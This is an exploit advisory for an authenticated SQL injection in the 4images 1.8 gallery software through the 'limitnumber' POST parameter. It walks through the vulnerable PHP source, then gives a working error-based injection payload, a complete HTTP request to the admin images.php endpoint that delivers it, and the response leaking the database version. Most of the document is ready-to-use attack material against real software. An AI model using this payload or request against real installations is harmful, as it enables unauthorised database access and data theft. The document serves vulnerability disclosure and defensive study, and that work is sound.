# Exploit Title: 4images 1.8 - 'limitnumber' SQL Injection (Authenticated) # Exploit Author: Andrey Stoykov # Software Link: https://www.4homepages.de/download-4images # Version: 1.8 # Tested on: Linux Source Analysis: Line #658 - User action defined if ($action == "findimages") { Line #661 - Vulnerable condition $condition = "1=1"; Line #654 - Default limit 50 show_input_row($lang['results_per_page'], "limitnumber", 50); Line #736 - Define limit start $limitstart = (isset($HTTP_POST_VARS['limitstart'])) ? trim($HTTP_POST_VARS['limitstart']) : ""; if ($limitstart == "") { $limitstart = 0; Line #743 - Define limit number $limitnumber = trim($HTTP_POST_VARS['limitnumber']); if ($limitnumber == "") { $limitnumber = 5000; } Line #763 - Define user input variables $limitfinish = $limitstart + $limitnumber; Line #786 - SQL statement $sql = "SELECT i.image_id, i.cat_id, i.user_id, i.image_name, i.image_media_file, i.image_date".get_user_table_field(", u.", "user_name")." FROM ".IMAGES_TABLE." i LEFT JOIN ".USERS_TABLE." u ON (".get_user_table_field("u.", "user_id")." = i.user_id) WHERE $condition ORDER BY $orderby $direction // Vulnerable user input of limitnumber LIMIT $limitstart, $limitnumber"; Line #852 - Display user input defined previously show_hidden_input("limitnumber", $limitnumber); Exploit POC: 1+procedure+analyse(extractvalue(rand(),concat(0x3a,version())),1,1)--+- HTTP Request: POST /4images/admin/images.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 406 Origin: http://127.0.0.1 DNT: 1 Connection: close Referer: http://127.0.0.1/4images/admin/images.php?action=modifyimages Cookie: 4images_lastvisit=1628349389; 4images_userid=1; sessionid=7ndqdr2u04gqs9gdme12vhco87 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: frame Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 __csrf=7aa2dd8597dfe4302237bbfeb200fbd8&action=findimages&image_id=&image_name=&image_description=&image_keywords=&cat_id=0&image_media_file=&image_thumb_file=&dateafter=&datebefore=&downloadsupper=&downloadslower=&ratingupper=&ratinglower=&votesupper=&voteslower=&hitsupper=&hitslower=&orderby=i.image_name&direction=ASC&limitnumber=1+procedure+analyse(extractvalue(rand(),concat(0x3a,version())),1,1)--+- HTTP Response: HTTP/1.1 200 OK ... XPATH syntax error: ':10.1.37-MariaDB'